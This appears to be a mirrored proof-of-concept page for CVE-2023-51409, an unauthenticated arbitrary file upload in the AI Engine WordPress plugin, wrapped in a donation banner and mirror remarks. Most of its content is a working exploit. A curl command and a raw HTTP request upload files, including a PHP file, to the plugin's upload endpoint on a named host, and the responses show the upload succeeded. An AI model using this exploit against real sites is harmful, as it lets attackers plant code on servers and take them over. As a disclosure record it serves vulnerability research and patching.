Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-51409 PoC — WordPress Plugin AI Engine 代码问题漏洞

Source
https://github.com/imhunterand/CVE-2023-51409
Associated Vulnerability
Title:WordPress Plugin AI Engine 代码问题漏洞 (CVE-2023-51409)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin AI Engine 存在代码问题漏洞,该漏洞源于存在危险类型文件无限制上传漏洞。
Description
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload
Readme
# CVE-2023-51409
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload

### Description:
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Severity: critical
CVE ID: CVE-2023-51409
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: ai-engine
WPScan URL: https://www.wpscan.com/plugin/ai-engine
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod
```

POC
---
CURL
```
$ cat test.txt
imhunterand.txt
$ curl -X POST http://wordpress.trusona.com/wp-json/mwai-ui/v1/files/upload -H "Content-Disposition: form-data; filename=\"test.txt\"" -F "file=@test.txt" | jq -r
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602
{
  "success": true,
  "data": {
    "id": "dc05affbc88c6d731a8fc6d122cd3839",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt"
  }
}

$ curl http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt
robbie.txt
```

RAW HTTP
---
Request

```
POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: wordpress.trusona.com
User-Agent: curl/8.1.2
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Length: 206
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
Connection: close

--------------------------8ecd2b831e8d20f4
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo(); ?>

--------------------------8ecd2b831e8d20f4--
```

Response
```
{
  "data": {
    "id": "1044f1ab4f6340fea9abecb331fe981c",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test.php"
  },
  "success": true
}
```
File Snapshot

 [4.0K]  /data/pocs/63f637536c4e926b9597edb4f1080757e1f5d550
├── [6.9K]  LICENSE
└── [2.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.